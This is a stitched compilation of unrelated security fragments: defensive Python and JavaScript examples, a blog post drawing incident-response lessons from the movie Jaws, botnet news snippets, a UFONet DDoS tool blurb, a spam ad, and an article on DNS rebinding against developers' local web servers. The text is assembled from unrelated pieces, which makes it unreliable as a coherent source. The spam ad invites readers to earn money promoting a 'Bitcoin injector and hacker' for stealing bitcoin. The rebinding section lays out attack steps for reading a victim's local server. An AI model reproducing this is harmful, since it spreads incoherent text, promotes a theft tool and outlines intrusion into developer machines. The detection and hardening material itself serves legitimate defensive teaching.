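The "path of least resistance" reasoning above is exactly what an attack tree with per-leaf cost makes explicit: an OR node costs what its cheapest child costs, an AND node costs the sum of its children, and a countermeasure is modelled by raising the cost of the leaf it hardens. The following is an added example, not code from the original post; the tree, its node names and every dollar figure are hypothetical and chosen only so the cheapest path moves the way the paragraph describes (buying dumps vs. attacking an information-disclosure flaw vs. phishing through a one-time password).

```python
"""Attack tree with per-leaf attacker cost, evaluated for the cheapest path.

Added example, not from the original post. Node names and costs are
hypothetical "attacker effort in dollars" figures for illustration.
"""
from dataclasses import dataclass, field
from typing import List, Tuple


@dataclass
class Node:
    name: str
    kind: str = "LEAF"                     # "LEAF", "OR" or "AND"
    cost: float = 0.0                      # meaningful for leaves only
    children: List["Node"] = field(default_factory=list)


def cheapest(node: Node) -> Tuple[float, List[str]]:
    """Return (cost, leaf names) of the cheapest way to achieve `node`."""
    if node.kind == "LEAF":
        return node.cost, [node.name]
    if node.kind == "OR":                  # attacker picks the cheapest alternative
        return min((cheapest(c) for c in node.children), key=lambda r: r[0])
    if node.kind == "AND":                 # attacker must do all of them
        total, path = 0.0, []
        for c in node.children:
            cost, leaves = cheapest(c)
            total += cost
            path += leaves
        return total, path
    raise ValueError(f"unknown node kind {node.kind!r}")


def set_cost(node: Node, leaf_name: str, cost: float) -> bool:
    """Model a countermeasure by raising one leaf's cost; True if the leaf exists."""
    if node.kind == "LEAF":
        if node.name == leaf_name:
            node.cost = cost
            return True
        return False
    return any(set_cost(c, leaf_name, cost) for c in node.children)


def build_tree() -> Node:
    """Hypothetical tree for the scenario in the text (all costs assumed)."""
    return Node("obtain customer card data", "OR", children=[
        Node("buy card dumps from an underground market", cost=500),
        Node("harvest card data from the bank web site", "OR", children=[
            Node("enumerate accounts via information disclosure", cost=200),
            Node("phish the customer and proxy the OTP", "AND", children=[
                Node("stand up a phishing kit on a fast-flux domain", cost=1500),
                Node("relay the one-time password in real time", cost=2000),
            ]),
        ]),
    ])


if __name__ == "__main__":
    tree = build_tree()
    print("before:", cheapest(tree))       # the information-disclosure flaw wins
    set_cost(tree, "enumerate accounts via information disclosure", 5000)
    print("after fixing disclosure:", cheapest(tree))   # buying dumps is now cheapest
```

Re-running `cheapest` after each `set_cost` is the useful part: it shows that fixing the disclosure flaw does not make the goal unreachable, it only moves the attacker to the next cheapest branch, which is the argument for defense in depth rather than a single anti-phishing control.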

7 Information Security Lessons You Can Learn By Watching The Movie JAWS
If you are an information security officer managing risk and incident response processes, I strongly recommend watching the movie Jaws as a case study in how human and business factors play into dealing with bad, unexpected and unforeseeable negative events, in this case shark attacks, and in how risk mitigation decisions are affected by human psychology. The movie is an example of how the human psyche responds to negative events through stages: (1) denial, (2) awareness, (3) responsibility, (4) action. I am not a psychologist, but this is my interpretation from applying common sense. Denial comes from the fact that until we (as people or as a business) are directly impacted by the consequences of a negative event, we most likely minimize the risk. Awareness is driven by having experienced a negative impact before, such as damage or a financial/asset loss, so that we raise our level of attention in response to feelings (fear). Responsibility comes from a feeling of duty, or from a role, to deal with the risk and its negative consequences; for example, as humans we might feel responsible for protecting the business, family and friends that depend on us, on our actions and on our role in society. The last stage of the incident/risk response process is the call to action. This is triggered either by the need to prevent further certain loss and damage or because someone else told us to act. If you watch the movie from this perspective, as a case study in managing the risk of security incidents such as data losses and fraud, you can see all these elements clearly and learn some lessons for dealing with security incidents:
Lesson #1: The first approach toward a risk, when it does not directly impact a business or an individual, is either to ignore it or to minimize it. The movie is about the risk of being killed by a shark. In the opening scene, a shark is seen wandering in the ocean and kills a girl during a skinny-dipping swim after a college party. The police, responding to the incident, find the remains of the body and need to file a report. The human remains are a clear indication of a shark attack, but the police chief filing the incident report is advised to minimize it for fear that reporting a shark attack would scare off the tourists coming to the town beaches on vacation. How does this lesson apply to information security risk? A company had a security incident and customer data was compromised as a result. The attack indicates that the attacker got the customer data by breaking into the database through one of the company's web sites. The business, together with the security and fraud teams, decides to file a security incident report stating that the web application database storing customer information has been compromised, but minimizes the potential impact since no customer PII (Personally Identifiable Information) has been compromised. The decision is to investigate further until more information is gathered.

Lesson #2: When the causes of the incident are not found and the fix does not address the root cause, more incidents will most likely occur and get noticed. Since the shark is still alive, it attacks again and claims another victim. At this point the incident cannot be ignored, since it happens in broad daylight with a lot of witnesses. In the meantime, another shark (not the killer) is caught and shown to the public as proof that the shark responsible for the attacks has now been caught and the beaches are no longer at risk. How does this apply to information security risk? The company did not find the cause of the exploit/data breach, so it suffered another cyber attack that exposed customer data to the public. Since the information about the data loss and the vulnerability is now public, the company needs to do something about its damaged reputation. The company then decides to release a statement to the public that no personally identifiable information was compromised as a result of the incident, and publicly discloses that the vulnerability has now been fixed and there is no risk to customers.

Lesson #3: When the measures adopted internally do not mitigate the risk of further incidents, you will most likely ask for help from outside, such as from a security subject matter expert or a consulting company. The police chief of the town where the shark attacks take place asks a researcher from the Oceanographic Institute for help in dealing with the killer shark. The researcher comes to town and starts his investigation; he soon realizes that this is the work of a great white shark and that the tiger shark believed to be the killer (the one shown to the public as a trophy) cannot be the one responsible for the killings, since the bite radius of its jaw does not match the teeth marks on the victims. The researcher explains the results of his analysis to the police and the town officials and recommends a call for action to kill the great white. After the meeting with the police chief and the mayor, it is still decided not to act. How does this apply to information security risk? The company's internal security team has identified some security vulnerabilities, like SQL injection, that were possibly the cause of the breach; these were fixed, but the attacks continued to occur, so a security consulting company is asked to analyze the problem further. The security researchers run some security tests (e.g. pen tests, vulnerability scans) and conclude that, even if some of the identified vulnerabilities such as SQL injection can be exploited for the type of attacks seen, other potentially critical security flaws (e.g. weak authorization controls, weak input validation) could be exploitable too; these flaws might require a design review to be identified and eventually require re-engineering the application security controls. The business is still undecided on whether to pursue these recommendations, since they require more explanation of the risk and impact to justify very expensive design changes to the application.

Lesson #4: When the impacts of the incidents get bigger and reach senior officials, they can no longer be ignored and it is decided to act. The shark attacks again, this time even more deadly; the people are now scared and demand prompt action from the mayor and the police chief to kill the shark. After the mayor and the police chief hear the people's complaints at a public hearing, they decide to finance a mission to kill the shark. How does this apply to information security risk? Fraudsters break into the site again, and this time the financial and reputational losses can no longer be ignored, including by senior management at the company, which now decides to prioritize the effort to mitigate this risk, assigns resources and spends money to identify the root causes of these attacks and to provide risk mitigation solutions.

Lesson #5: The first approach to dealing with the attacks takes the defensive perspective: detect the negative events and pinpoint the threat sources. The police chief, the shark hunter and the Oceanographic Institute researcher devise different techniques to locate the shark, such as harpooning floating barrels onto it from the fishing boat. These "sensors" seem to work: for a moment the killer shark is located and tracked and seems to be within reach of a shot. How does this apply to information security risk? The company installs a new Security Information and Event Management (SIEM) system and starts to closely monitor the attacks by looking at logs and incident events. Once an alert from the SIEM is triggered, it is decided to block the IP address of the most likely source.

Lesson #6: If you deal only with the symptoms instead of the root causes of an incident, the countermeasures can be bypassed by the attacker and the risk is still not mitigated. Despite all the effort put into detecting the killer shark, the shark outsmarts the fishermen, the oceanographer and the police chief by breaking the lines to which the floating barrels were attached, and attacks the boat unnoticed. The shark now attacks the boat directly, breaks it and causes it to sink. How does this apply to information security incidents? The fraudster has learned that event-evasion techniques can be used against the application: a SIEM event that pinpoints the source IP address to block its traffic does not stop the attack, since the attacker uses proxies and fast-flux botnet techniques where the source IP changes dynamically in real time.
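Lessons #5 and #6 come down to what the detection rule is keyed on. The following is an added example, not code from the original post: it runs one constructed access log through the same counting rule twice, once keyed by source IP (the SIEM rule that gets evaded by proxies and fast flux) and once keyed by the session cookie, which the attacker has to keep constant to stay logged in while enumerating records. The log format, the `/lookup` path and the threshold are assumptions for this illustration.

```python
"""One abuse rule, keyed two ways: by source IP and by session.

Added example, not from the original post. The log lines and their
format are constructed; a real deployment would parse its own format and
tune the threshold, but the keying choice is the point.
"""
import re
from collections import Counter

# Constructed log: 20 record lookups from one session, each routed through a
# different proxy IP, mixed with a legitimate user doing 2 lookups from one address.
ATTACK_LINES = [
    f"203.0.113.{10 + i} sess=f00d GET /lookup?customer_id={1000 + i} 200"
    for i in range(20)
]
LEGIT_LINES = [
    "198.51.100.7 sess=cafe GET /lookup?customer_id=1001 200",
    "198.51.100.7 sess=cafe GET /account 200",
    "198.51.100.7 sess=cafe GET /lookup?customer_id=1001 200",
]
LOG = "\n".join(ATTACK_LINES + LEGIT_LINES)

# Assumed line format: "<ip> sess=<token> <METHOD> <path> <status>"
LINE = re.compile(
    r"^(?P<ip>\S+) sess=(?P<sess>\w+) (?P<method>[A-Z]+) (?P<path>\S+) (?P<status>\d{3})$"
)


def parse(log):
    """Yield one dict per well-formed line; malformed lines are skipped, not fatal."""
    for line in log.splitlines():
        m = LINE.match(line)
        if m:
            yield m.groupdict()


def offenders(records, key, path_prefix="/lookup", threshold=5):
    """Keys (IP addresses or session tokens) with more than `threshold` lookups."""
    counts = Counter(r[key] for r in records if r["path"].startswith(path_prefix))
    return sorted(k for k, n in counts.items() if n > threshold)


if __name__ == "__main__":
    records = list(parse(LOG))
    print("by ip:     ", offenders(records, "ip"))      # nothing crosses the line
    print("by session:", offenders(records, "sess"))    # the enumeration session does
```

Keying on the session (or the authenticated account) is not a silver bullet either; the attacker can rotate sessions, which is why the text moves on to fixing the transaction itself in Lesson #7. But it is the key that the attacker's proxies and fast-flux hops do not change, so it catches the behaviour that the IP rule is blind to.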

Lesson #7: By tackling the causes of the incidents and the sources of the attacks, the risk of further attacks is finally mitigated. The men on the boat are now actively engaged in fighting back against the shark; during a dramatic struggle, the police chief throws a compressed-air scuba tank into the shark's jaws and then aims at it with a rifle, causing the tank to explode. How does this apply to information security risk? After an analysis of the attack scenarios, the most probable attack patterns are simulated, and the attack surface of the application is identified along with the possible data entry points for intrusion. The data entry point most likely used by the attacker is a web form that initiates a database query transaction to gather customers' demographic information; access to this form and the transaction is temporarily disabled through configuration changes, and this prevents the attack from recurring. The application logs collected during the attacks are provided to law enforcement. These, along with other information collected by law enforcement, such as the attacker's toolkit/scripts used in the attack, provide enough information to pinpoint the attacker, take down the IP address and eventually catch the fraudster in a sting operation. A further security design review of the application identified flaws in the implementation of the transaction that queries demographic customer data, such as elevation of user privilege through changes to query parameters that were not validated by the server. Application design changes are implemented to prevent further attacks, such as strictly enforcing role-based access control on the server side with new policy rules, and changing the web form so that it no longer passes role/permission parameters in the query. These fixes were implemented in a new patch and access to these transactions was re-enabled for the customers. Finally, a disclaimer: the examples mentioned herein are not factual.
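The design flaw in Lesson #7 (role and permission parameters carried in the query and trusted by the server) and its fix (role taken from the server-side session, access decided by a server-side policy) are small enough to show side by side. The following is an added example, not code from the original post; the customer records, sessions, permission table and the `lookup_*` handlers are constructed for this illustration and stand in for whatever the real application's request handling looks like.

```python
"""Customer-lookup transaction: the version that trusts role parameters from
the form beside the version that enforces RBAC on the server side.

Added example, not from the original post. Records, sessions and the
permission table are constructed for illustration.
"""

# Constructed data stores (not real customers or sessions).
CUSTOMERS = {
    "1001": {"name": "A. Rossi", "zip": "20121"},
    "1002": {"name": "B. Bianchi", "zip": "00184"},
}
SESSIONS = {
    "sess-abc": {"user": "rossi", "role": "customer", "customer_id": "1001"},
    "sess-xyz": {"user": "agent7", "role": "agent", "customer_id": None},
}
# Server-side policy: what each role may do. Customers see only their own record.
PERMISSIONS = {"customer": {"own_record"}, "agent": {"own_record", "any_record"}}


class Forbidden(Exception):
    pass


def lookup_vulnerable(session_id, params):
    """The Lesson #7 flaw: the role arrives as a form field, so a customer
    session can add role=agent to the query and read any record."""
    role = params.get("role", "customer")          # attacker-controlled
    cid = params.get("customer_id", "")            # attacker-controlled
    if role != "agent" and cid != SESSIONS[session_id]["customer_id"]:
        raise Forbidden("not your record")
    return CUSTOMERS[cid]


def lookup_hardened(session_id, params):
    """Role comes from the server-side session; the form supplies only the
    requested id, which is validated before it reaches the query."""
    session = SESSIONS[session_id]
    cid = params.get("customer_id", "")
    if not (cid.isdigit() and len(cid) <= 10):    # input validation
        raise Forbidden("invalid request")
    allowed = PERMISSIONS.get(session["role"], set())
    if "any_record" in allowed or (
        "own_record" in allowed and cid == session["customer_id"]
    ):
        record = CUSTOMERS.get(cid)
        if record is not None:
            return record
    # One generic answer for "denied" and "no such id", so the endpoint
    # cannot be used to enumerate which customer ids exist.
    raise Forbidden("invalid request")


def is_denied(handler, session_id, params):
    """True if `handler` refuses the request (used to demonstrate the difference)."""
    try:
        handler(session_id, params)
    except Forbidden:
        return True
    return False


if __name__ == "__main__":
    escalated = {"role": "agent", "customer_id": "1002"}
    print("vulnerable, customer asks as agent:", lookup_vulnerable("sess-abc", escalated))
    print("hardened, same request denied:", is_denied(lookup_hardened, "sess-abc", escalated))
    print("hardened, real agent:", lookup_hardened("sess-xyz", {"customer_id": "1002"}))
```

Two details beyond the role fix are worth noting: the id is validated before it is used as a key (the "weak input validation" finding from Lesson #3), and a record that does not exist produces the same response as one the caller may not see, which removes the account-enumeration oracle the phishing post above warns about.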

Linksys and Persirai: the current DDoS situation in IoT

Online marketplaces, well-known telephony and DNS services: all of them have recently come under DDoS fire. The attacks were carried out through IoT botnets. How are manufacturers, Internet users and governments responding? Still large security holes in IoT devices. A few weeks ago the American hardware manufacturer Linksys found security vulnerabilities in several router models of the WRT and EAxxx series. Through these [...]

The post "Linksys und Persirai – die aktuelle DDoS-Lage von IoT" appeared first on Myra.


Earn $10 Per Sale In Your Bitcoin Account With Proof
I recently started to promote an unknown product for an unknown person. The name of this product is Bitcoin injector and hacker. I don't know whether the product really works or not, and I did not try it out to steal bitcoin, but instead I started to promote this product and I got $50 in my blockchain account in a few days. The price of the software is $20; when someone buys this product through your affiliate link, $10 goes to the owner's bitcoin account and $10 goes to the promoter's bitcoin account.

For more information and payment proofs
click here

==========================================================
          Media Alert: WatchGuard Presents "Understanding and Blocking the Evolving Bot" at RSA        
WatchGuard Security Experts Provide In-depth Analysis and Network Defense Techniques to Thwart Botnet Attacks

          Cisco: spam volume is falling, targeted attacks are rising, and the new generation of employees tends to ignore internet threats        
Was 2010 a turning point in the development of cybercrime? That was the first year in which the volume of spam being generated began to fall. In 2011 the trend continued, mainly as a result of the takedown of several key botnets over the previous two years. The number of security vulnerabilities rose, fewer large-scale attacks were recorded, while the number of attacks aimed at specific targets increased. These are some of the key findings of the Cisco 2011 Annual Security Report, which presents the most significant network security threat trends recorded this year and provides tips and guidelines that companies can follow to better secure their business environments. The 5th edition of Cisco's annual security report also, for the first time, analyses in depth how the behaviour of the new generation of employees increases personal and corporate risk in an already complicated security landscape.
          UFONet – Open Redirect DDoS Tool        

UFONet is an open redirect DDoS tool designed to launch attacks against a target using insecure redirects in third-party web applications, like a botnet. Obviously, only for testing purposes. The tool abuses OSI Layer 7 (HTTP) to create and manage ‘zombies’ and to conduct different attacks using GET/POST, multi-threading, proxies, origin spoofing methods, cache evasion techniques, etc. […]

The post UFONet – Open Redirect DDoS Tool appeared first on Darknet - The Darkside.


          The Pirate Bay. And now something completely different        
I’ve seen an awful lot of folk throwing all of their toys out of the pram in light of the news that the Pirate Bay is to be sold to some shady company who wish to monetise it. Botnets have been summoned to take down the Pirate Bay’s homepage, and many people appear to have […]
          5 ways to have fun while not doing IPAM this Christmas        

At the end of a year overshadowed by Mirai botnets, leaked emails, late-night Twitter rants and talk of upgrading the dormant Cold War to Version 2.0,  perhaps this Christmas is the ideal time to sit back, pop that (nut) roast in the oven and relax with a little something different. Have your pick from this short collection of fun IPAM-like things to enjoy this festive season.


          Cylance blamed for DirectDefense’s ‘botnet’ disclosure        

Twenty-four hours after Carbon Black responded to a report from DirectDefense that their Cb Response product was leaking customer information (it doesn't), one company executive is pointing the finger at Cylance as the source of the disclosure.

Salted Hash covered the story yesterday. 

To recap: DirectDefense published a blog post accusing Carbon Black of being "the world’s largest pay-for-play data exfiltration botnet."

The reason is that their product, Cb Response, uploads files it does not recognise to VirusTotal. DirectDefense called this a serious breach of confidentiality, noting that Carbon Black's "prevalence in the marketspace and the design of their solution’s architecture seems to be providing a significant amount in data exfiltration."



          IT's 9 biggest security threats        

Years ago the typical hacking scenario involved a lone attacker and maybe some buddies working late at night on Mountain Dew, looking for public-facing IP addresses. When they found one, they enumerated the advertising services (Web server, SQL server and so on), broke in using a multitude of vulnerabilities, then explored the compromised company to their heart's content. Often their intent was exploratory. If they did something illegal, it was typically a spur-of-the-moment crime of opportunity.

My, how times have changed.

When describing a typical hacking scenario, these days you must begin well before the hack or even the hacker, with the organization behind the attack. Today, hacking is all crime, all the time, complete with bidding markets for malware, crime syndicates, botnets for hire, state actors, and cyber warfare gone amok.



          IDG Contributor Network: It’s time for defensive worms        

We’re entering a new age of cybersecurity, where worms will be just as critical for defense as they are for offense. This is going to surprise many people in the security industry, who for many years have thought of worms as only a malicious tool.

To provide some historical context, for the past 10+ years, the security community and government have been obsessed with botnets and “Advanced Persistent Threats.” Most of the defensive tools and strategies, as well as cyber laws, regulations and policies, are centered around these threats. But the truth is, worms are the real basis of many of the most advanced actors on the stage. After all, what were Stuxnet, Flame and Duqu but worms at heart? All top-line nation-state tools are capable of self-replication, as autonomous operation is the key to any cyber espionage effort where gaining persistence on an air-gapped network is required.



          Pentest firm calls Carbon Black "world’s largest pay-for-play data exfiltration botnet"        

On Wednesday, DirectDefense, Inc. disclosed that they've discovered hundreds of thousands of files from Carbon Black customers.

The discovery is said to pose a significant risk to Carbon Black's clients, because of the company's dependence on third-party multiscanners in the Cb Response product.

In a blog post, Jim Broome, president of DirectDefense said that the problems with Carbon Black's Cb Response were first detected when his firm was working an incident for a customer.

He describes the issue as a problem with "trust model leveraged between third party vendors utilized by Carbon Black’s Cb Response EDR platform, which sends end user files to a third-party antivirus multiscanner solution to determine if the files are safe for use in the enterprise network."



          Genetic Algorithm based Layered Detection and Defense of HTTP Botnet        

An HTTP botnet uses the HTTP protocol to build a chain of bots, compromising further systems as it grows. Because the traffic is HTTP on port 80, attacks are not only hidden but also pass through the firewall without being detected. DPR-based detection gives a better analysis of botnet attacks [3], but it provides only probabilistic detection of the attacker and is time consuming and error prone. This paper proposes a genetic-algorithm-based layered approach for detecting as well as preventing botnet attacks. The paper reviews a P2P firewall implementation which forms the basis of the filtering. Performance is evaluated in terms of precision, F-value and probability. The layered approach reduces the computation and overall time requirement [7]. The genetic algorithm promises a low false positive rate.
           #RootedCON2012 - DNS: A botnet dialect - Carlos Diaz Francisco J Gomez -- http://tco/imCPovz8        
2012-03-21 07:22:37 - ebordac : #RootedCON2012 - DNS: A botnet dialect - Carlos Diaz Francisco J Gomez -- http://tco/imCPovz8
          Fort Disco, a botnet that has infected 25,000 Windows computers        

Recently, Arbor Networks reported a new botnet variant that has infected more than 25,000 computers running Windows with its malware. The botnet uses an as-yet unknown method to infect its victims. What is certain is that, once infected, the victim's computer can be used to spread this new botnet and attack other systems.


What is a botnet?

For those who do not yet know what a botnet is: the word comes from "robot network", a collection of zombie PCs that have been infected by malware sent by a botmaster, or botnet controller, who can be called a hacker because they have got past the firewall and into the computer to plant the malware via the internet. Once a PC is infected, the botmaster can control thousands of zombie PCs through a C&C server. C&C stands for Command and Control: a server that issues orders and can direct thousands of zombie PCs in an attack. The attacks can be DDoS, spam messages, and so on. It is of course frightening when someone manages to control such a botnet, because targets are very easy to overwhelm; zombie PCs are usually used to DDoS a single target from thousands of machines at once.


Below is an illustration of a botmaster carrying out an attack through the C&C.


Matthew Bing, a researcher at the Arbor Security Engineering & Response Team (ASERT), said that Arbor ASERT has been tracking the botnet, dubbed Fort Disco, since May 2013. They have identified six command-and-control (C&C) sites controlling more than 25,000 infected Windows machines, and claim that most of those control sites are located in Russia and Ukraine. Once infected with Fort Disco, a Windows machine launches brute-force attacks to guess the passwords of blogs and PHP-based CMSs. So far, more than 6,000 installations of Joomla, WordPress and Datalife Engine are believed to have been hit by the brute-force attacks.

Bing also said that the attack pattern has several sophisticated features that make it impossible to trace fully. On top of that, how the malware gets installed on a system is still unclear. He and his team have only been able to find the original name of the malware, “maykl_lyuis_bolshaya_igra_na_ponizhenie.exe”. The name refers to the Russian-language edition of Michael Lewis's book “The Big Short: Inside the Doomsday Machine”, and the file arrived as an executable attachment. Another file name, “proxycap_crack.exe”, refers to a crack for the ProxyCap program.

Bing added that the motive for collecting the passwords is still unknown. Even so, password theft has become a serious problem for the security community. Many groups targeting professional forums have been caught; they hope to steal users' login details for malicious use.


#IndonesiaCyberNews

          “Giving Thanks for Cheap Botnet Attacks”        
There are Chinese websites offering distributed-denial-of-service (“DDoS”) attacks for sale.  Reminder: DDoS attacks generally involve a hacker taking control of a bunch of internet-connected computers (a botnet) and telling them to flood a web server with enough traffic to crash the system.  While Chinese sites get a lot of press, there are plenty of other places […]
          Imperva: the decline of botnets …        
With the fourth edition of its “Bot Traffic Report”, Imperva highlights new developments in the presence of bots on the internet.
          TDSS, a $250,000 botnet        
A new version, partner networks, a development budget: the business model of malicious software looks remarkably like that of the legitimate market. Kaspersky has studied the behaviour of the TDSS software (also known as TDL), and in particular its latest version, TDL-4.
          Network Security Platform version 6 targets botnets        
McAfee releases a new version of its intrusion prevention system (IPS). Version 6 of Network Security Platform (NSP) puts the emphasis on stronger control of botnets.
          The number of botnets is rising sharply        
Microsoft is sounding the alarm. According to the company, the botnet threat is growing strongly. That is what its 9th security report reveals, compiled from data collected on 600 million computers worldwide.
          A botnet that pays well        
          Oracle buys DNS provider Dyn to strengthen its cloud computing platform        

After being the centre of media attention following an attack by the Mirai botnet that paralysed access to its customers' sites in the eastern United States (even though some sites were also unreachable from Europe), Dyn is back in the news with a new acquisition agreement it has signed with Oracle.

« Oracle has announced the signing of an agreement to acquire Dyn, the leading provider...
          Vulnerable Web Applications on Developers Computers Allow Hackers to Bypass Corporate Firewalls        

Software and web developers, owners of the latest IoT gadgets and people who just like to surf the web at home have one thing in common: they are all protected by a firewall.

Businesses typically protect their networks with dedicated, robust hardware firewalls, while home users usually have one built into their routers. Firewalls are essential for internet security, since they prevent anyone on the outside from accessing the internal network, and possibly sensitive data. However, firewalls are no panacea. In some cases, malicious hackers can still attack a vulnerable web application that is hosted behind a firewall.

In this blog post, we will explain the different methods attackers can use to reach vulnerable web applications behind firewalls, and what countermeasures can be taken to thwart such attempts.

How many Developers are Vulnerable to These Type of Attacks?

It is difficult to estimate how many web developers may be vulnerable to this type of attack. We did, however, run a survey of web developers, and here are some interesting findings:

  • 81% of respondents run their software on a web server
  • 89% claimed they keep their web server software up to date
  • 52% say they run vulnerable/undeveloped web applications on their server
  • 55% are running web apps in development on servers directly connected to the internet
  • 32% admitted to hardening the web applications on their test environment

According to the above statistics, 52% of web developers may be vulnerable to the type of attacks documented in this article. That is quite a shocking statistic, but not a surprising one, as Ferruh Mavituna explained when announcing the web developer survey results. An even more shocking fact is that 55% of the respondents admit that from time to time these web applications run on computers which are connected directly to the internet. That is definitely something businesses should tackle as early as possible.

A Typical Web Application Developer’s Test Setup

As a web application developer it is impossible to write code without a proper testing environment. Fortunately, it is easy to install the pre-configured applications typically used for testing, so the majority of developers run a web server on their own machine.

On Windows, there are popular packages such as XAMPP, which installs Apache, MySQL and PHP, a common combination for web development. On Linux, the same can be done by installing the needed packages with the package manager. Both methods have the advantage that Apache is preconfigured to a certain degree. However, to prevent the Apache web server from being publicly accessible, developers have to configure it to listen on 127.0.0.1:80 instead of 0.0.0.0:80, or else use a firewall to block incoming connections. But is this enough to block incoming connections and possible malicious attacks in a testing environment?

Protected Test Web Server & Applications Are Still Vulnerable to Malicious Attacks

Unfortunately, many assume that the security measures mentioned above are enough to prevent anyone from sending requests to the web applications running on the test Apache web server. They assume that this form of "eggshell security", hardened on the outside but soft on the inside, allows them to run vulnerable test applications safely.

People also often assume that they are safe even if a vulnerable or compromised machine is on the same network, as long as it does not contain personal data. However, it is still possible for an attacker to tamper with files or databases, some of which are typically later used in production environments. Attackers can also probe the internal network for weaknesses. In some cases, it is even possible to use methods like ARP spoofing to carry out Man-In-The-Middle (MITM) attacks.

But how can an attacker gain access to the development environment, when it is correctly configured to only listen on the loopback interface? Or even better, it is not even accessible from the outside because of a firewall, or because it only allows whitelisted access from within the internal network? The answer is simple: Through the developer’s web browser.

Attacking the Developer’s Vulnerable Test Setup Through the Web Browser

Web browsers are considered to be the biggest attack surface on personal computers; their codebase and functionality are steadily growing, and over the years there have been some notoriously insecure browsers and plugins. Attackers also target browsers because of shortcomings in the design of some modern protocols and standards. Most of them were built with good intentions, but they can also lead to serious vulnerabilities and easy cross-domain exploitation. For example, in some cases it is even possible to use the victim's browser as a proxy and tunnel web requests through it.

But new technologies are not the only problem with web browser security. There are much older issues. One of the issues with the biggest impact is the fact that every website is allowed to send requests to any other reachable website. Contrary to popular belief, the Same Origin Policy does not prevent a page from sending a request to another origin. It only prevents the page from reading the response. Therefore attacker.com can easily send requests to 127.0.0.1, and that is obviously a big problem.

In this article, we are going to explain how malicious attackers can execute a number of browser based attacks to retrieve data from the victim’s computer, which could be sitting behind a firewall or any other type of protection.

Vulnerable Test Websites on a Local Machine

The problem with Vulnerable Test Environments

Security researchers and developers typically run vulnerable applications on their machines. Developers, for example, typically have web applications that are still in development, where security mechanisms such as CSRF tokens or authentication may not be in place yet.

Security researchers have the same type of applications running on their computers. It is their job to find security issues, so they are typically testing vulnerable web applications, which makes them an easy target for these kinds of exploits.

Since the Same Origin Policy (SOP) prevents the attacker from mapping the web application to search for vulnerabilities, he has two options for attacking the victim:

  1. A blind approach, in which the attacker has to brute force file and parameter names;
  2. A method with which he can actually view and explore the web application. This is where techniques such as DNS rebinding come into play.

DNS Rebinding Attack

This attack method is simple and allows attackers to easily retrieve information from the victim's computer if it is running a web server. During this attack the malicious hacker exploits the browser's DNS resolution mechanism to retrieve information from a /secret/ subdirectory on the victim's server, as explained below:

  1. The attacker sets up a website on a live domain, for example attacker.com, hosted on the IP address 11.22.33.44.
  2. The attacker configures a very short DNS cache time (TTL, time to live) for the FQDN's record.
  3. He serves a malicious script to the victim that, when executed, keeps requesting pages from attacker.com and sends whatever it finds back to the attacker. The exfiltration endpoint has to be a second attacker-controlled host or IP address that is not rebound, because after step 4 the name attacker.com resolves to the victim's own machine.
  4. The attacker changes the IP address of the FQDN attacker.com to 127.0.0.1.
  5. Since the TTL was set to a very short time, the browser resolves attacker.com again when the script next requests the content of the /secret/ subdirectory. The script has to wait about a minute before doing so, because browsers pin a resolved address in their own cache for roughly that long regardless of the record's TTL.
  6. Since the script is still running and attacker.com now resolves to 127.0.0.1, the script's request for attacker.com/secret/ is sent to 127.0.0.1/secret/ instead of 11.22.33.44/secret/, and the script reads the victim's /secret/ directory from what is, to the browser, the same origin.

It is very difficult for the victim to identify this type of attack since the domain name is still attacker.com. And since the malicious script runs on the same domain, it also partially bypasses the Same Origin Policy.

DNS Rebinding is a Preventable Attack

DNS rebinding attacks can be prevented at the web server level. We will talk more about prevention at the end of this article, but here is a short overview: as a developer, you should give your local web server a fully qualified name such as local.com and whitelist that Host header, so that any HTTP request whose Host header is not on the list is rejected. A rebound request still carries the attacker's hostname in its Host header, because the browser sends the name it navigated to, not the IP address that name resolved to.

Shared hosting is prone to DNS rebinding only to a certain degree. This is because the web server decides which of its websites to serve based on the Host header. If the Host header is not known to the web server, it returns the default website. So in this scenario, only the default host is vulnerable to such an attack.
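The Host header allowlist described above, as an added example that is not code from the original article or from any tool it mentions. It gates the request object before any application code runs; the names local.com and localhost, the 421 status code and the constructed requests at the end are assumptions. The functions take a plain headers object so the logic can be read and exercised without starting a server.

```javascript
// Added example (not from the original article): reject DNS-rebound requests
// by allowlisting the Host header.  Hostnames here are assumptions.
const ALLOWED_HOSTS = new Set(['local.com', 'localhost', '127.0.0.1']);

// Normalise a Host header value: lower-case, strip an explicit port, unwrap an
// IPv6 literal ("[::1]:8080" -> "::1").  Returns null for a missing or
// malformed header, and the caller treats null as "reject".
function normaliseHost(hostHeader) {
  if (typeof hostHeader !== 'string') return null;
  const h = hostHeader.trim().toLowerCase();
  if (h.startsWith('[')) {
    const end = h.indexOf(']');
    return end > 1 ? h.slice(1, end) : null;
  }
  const colon = h.lastIndexOf(':');
  const name = colon === -1 ? h : h.slice(0, colon);
  return name.length > 0 ? name : null;
}

function isAllowedHost(hostHeader, allowed = ALLOWED_HOSTS) {
  const name = normaliseHost(hostHeader);
  return name !== null && allowed.has(name);
}

// Request gate.  After rebinding, the victim's browser still sends
// "Host: attacker.com": it fills in the name it navigated to, not the
// address that name happened to resolve to.  That mismatch is the tell.
function gateRequest(headers) {
  if (!isAllowedHost(headers.host)) {
    return { status: 421, body: 'Misdirected Request: Host header not allowlisted' };
  }
  return { status: 200, body: 'ok' };
}

// Constructed requests: what a rebound page sends versus what the developer
// types into the address bar.
const rebound = { host: 'attacker.com' };
const legit = { host: 'local.com:80' };
console.log(gateRequest(rebound).status, gateRequest(legit).status); // 421 200
```

To wire this into a Node http server, call gateRequest(req.headers) at the top of the request handler and end the response with the returned status before any application code runs. The equivalent on Apache is to make the first VirtualHost (the default) a catch-all that denies everything and put the real application only in a VirtualHost whose ServerName is local.com, so a request with an unknown Host header lands on the denying default rather than on the application.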

Same Origin Policy is not completely bypassed

Since this is an entirely new domain that the user visited, and only the IP address matches, it is not possible for the attacker to steal session information. Cookies are tied to a specific hostname by the browser, not to an IP address. This means that a cookie for http://127.0.0.1 is not valid for http://attacker.com even though it points to 127.0.0.1.

However, in many cases a valid cookie is not needed, for example when a security researcher has a web application that is vulnerable to command injection and requires no authentication. In such a case, the attacker can use either DNS rebinding or simple CSRF (once he knows the vulnerable file and parameter) to issue system commands.

Do Not Run Unpatched Web Applications on Local Machines - It is Dangerous

It is worth mentioning that there are many reasons why even non-developer users tend to have outdated software on the local network. It could be either because they forgot to update the software, or they do not know that an update is available. Many others do not update their software to avoid having possible compatibility issues.

